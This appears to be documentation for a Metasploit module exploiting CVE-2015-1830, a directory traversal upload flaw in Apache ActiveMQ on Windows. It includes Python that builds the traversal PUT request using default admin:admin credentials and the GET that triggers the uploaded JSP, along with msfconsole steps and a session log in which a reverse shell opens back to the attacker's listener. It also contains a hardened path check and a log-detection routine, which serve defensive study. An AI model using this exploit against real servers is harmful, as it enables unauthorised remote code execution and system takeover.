Introduction
A directory traversal vulnerability was discovered in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows. The vulnerability, tracked as CVE-2015-1830, allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.
Because vulnerable servers do not reject directory traversal in the fileserver path, they accept HTTP PUT requests for `/fileserver/..\admin\<file>` and write the file into the admin webapp, so it is served from `/admin/<file>`. The backslash matters: the affected targets are Windows hosts, where `\` is a path separator. For the PUT request to succeed, valid credentials must be supplied.
This module exploits CVE-2015-1830 by uploading a JSP payload to the target via an HTTP PUT request for `/fileserver/..\admin\<payload>.jsp`, authenticating with the default credentials admin:admin (or any other credentials provided by the user). It then issues an HTTP GET request for `/admin/<payload>.jsp` on the target to trigger the payload and obtain a shell. The module has been successfully tested against ActiveMQ 5.11.1 on a Windows 7 machine.
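As an added illustration (not code from the module or from ActiveMQ), the Python below models why the traversal works on a Windows host, builds the raw PUT and follow-up GET that the description above implies, adds a hardened path check that also catches the percent-encoded form of the same path, and runs that check over a few constructed access-log lines. The webapps directory layout, the HTTP status codes and the log lines are assumptions made for the example.

```python
import base64
import ntpath
import posixpath
from urllib.parse import unquote

FILESERVER_ROOT = "/fileserver/"  # the webapp the vulnerable PUT is addressed to

# Constructed, Jetty-style request-log lines for the detection part (not real captures).
SAMPLE_LOG = [
    '192.168.1.1 - - [04/Feb/2020:09:55:36 +0000] "PUT /fileserver/..\\admin\\x.jsp HTTP/1.1" 204 0',
    '192.168.1.1 - - [04/Feb/2020:09:55:37 +0000] "GET /admin/x.jsp HTTP/1.1" 200 0',
    '192.168.1.5 - - [04/Feb/2020:10:01:00 +0000] "PUT /fileserver/report.txt HTTP/1.1" 204 0',
]


def windows_resolve(webapps_dir: str, request_path: str) -> str:
    """Model (assumed layout, not ActiveMQ's own code) of a naive join of the
    fileserver webapp directory with the rest of the request path on Windows.
    ntpath treats '\\' and '/' alike, so '..\\admin\\x.jsp' climbs out of the
    fileserver directory into the sibling admin webapp."""
    relative = request_path[len(FILESERVER_ROOT):]
    return ntpath.normpath(ntpath.join(webapps_dir, "fileserver", relative))


def is_traversal(request_path: str) -> bool:
    """Hardened check: percent-decode, treat backslash as a separator, normalise,
    and refuse any path that no longer lives under /fileserver/."""
    decoded = unquote(request_path).replace("\\", "/")
    normalised = posixpath.normpath(decoded)
    return not (normalised + "/").startswith(FILESERVER_ROOT)


def build_put_request(host, port, path, filename, username, password, body: bytes) -> bytes:
    """Raw HTTP/1.1 PUT with Basic auth: the traversal sits in the request line,
    the credentials in the Authorization header."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    head = "\r\n".join([
        f"PUT {path}{filename} HTTP/1.1",
        f"Host: {host}:{port}",
        f"Authorization: Basic {token}",
        "Content-Type: application/octet-stream",
        f"Content-Length: {len(body)}",
        "Connection: close",
        "", "",
    ])
    return head.encode() + body


def build_get_request(host, port, filename) -> bytes:
    """The follow-up GET for /admin/<filename> that executes the uploaded JSP."""
    return f"GET /admin/{filename} HTTP/1.1\r\nHost: {host}:{port}\r\nConnection: close\r\n\r\n".encode()


def suspicious_request_lines(log_lines):
    """Detection: (method, path) pairs for PUTs whose path escapes /fileserver/."""
    hits = []
    for line in log_lines:
        try:
            method, path, _version = line.split('"')[1].split(" ")
        except (IndexError, ValueError):
            continue  # not a request line we understand
        if method == "PUT" and path.startswith(FILESERVER_ROOT) and is_traversal(path):
            hits.append((method, path))
    return hits


if __name__ == "__main__":
    print(windows_resolve(r"C:\activemq\webapps", "/fileserver/..\\admin\\x.jsp"))
    for p in ("/fileserver/notes.txt", "/fileserver/..\\admin\\x.jsp", "/fileserver/%2e%2e%5cadmin%5cx.jsp"):
        print(p, "-> traversal" if is_traversal(p) else "-> ok")
    print(build_put_request("192.168.1.2", 8161, "/fileserver/..\\admin\\", "x.jsp",
                            "admin", "admin", b"<%-- jsp --%>").decode())
    print(build_get_request("192.168.1.2", 8161, "x.jsp").decode())
    print(suspicious_request_lines(SAMPLE_LOG))
```

The point of `is_traversal` is the order of operations: decode first, then map `\` to `/`, then normalise, then compare against the allowed prefix. A check that only looks for the literal string `../` misses both `..\` and `%2e%2e%5c`, which is exactly the gap this module's default PATH walks through.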
Verification Steps
- Install the module as usual
- Start msfconsole
- Do: `use exploit/windows/http/apache_activemq_traversal_upload`
- Do: `set RHOSTS [IP]`
- Do: `set payload [payload]`
- Do: `set LHOST [IP]`
- Do: `exploit`
Options
- PASSWORD. The default setting is `admin`.
- PATH. This option is the traversal path, `/fileserver/..\admin\` by default.
- Proxies. This option is not set by default.
- RHOSTS. To use: `set RHOSTS [IP]`
- RPORT. The default setting is `8161`. To use: `set RPORT [PORT]`
- SSL. The default setting is `false`.
- THREADS. The default setting is `1`.
- USERNAME. The default setting is `admin`.
- VHOST. This option is not set by default.
- TARGETURI. This option is the base path, `/` by default.
Compatible Payloads
- generic/custom
- generic/shell_bind_tcp
- generic/shell_reverse_tcp
- java/jsp_shell_bind_tcp
- java/jsp_shell_reverse_tcp
Payload Options
- LHOST. To use: `set LHOST [IP]`
- LPORT. The default setting is `4444`. To use: `set LPORT [PORT]`
- SHELL. This option is not set by default.
Scenarios
```
msf5 exploit(windows/http/apache_activemq_traversal_upload) > show options

Module options (exploit/windows/http/apache_activemq_traversal_upload):

   Name       Current Setting        Required  Description
   ----       ---------------        --------  -----------
   PASSWORD   admin                  yes       Password to authenticate with
   PATH       /fileserver/..\admin\  yes       Traversal path
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.2            yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8161                   yes       The target port (TCP)
   SSL        false                  no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                      yes       The base path to the web application
   USERNAME   admin                  yes       Username to authenticate with
   VHOST                             no        HTTP server virtual host

Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.

msf5 exploit(windows/http/apache_activemq_traversal_upload) > exploit

[*] Started reverse TCP handler on 192.168.1.1:4444
[*] Uploading payload...
[*] Payload sent. Attempting to execute the payload.
[*] Payload executed!
[*] Command shell session 1 opened (192.168.1.1:4444 -> 192.168.1.2:49194) at 2020-02-04 10:55:36 +0100

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Desktop\activemq 5.11.1\apache-activemq-5.11.1\bin\win64>
```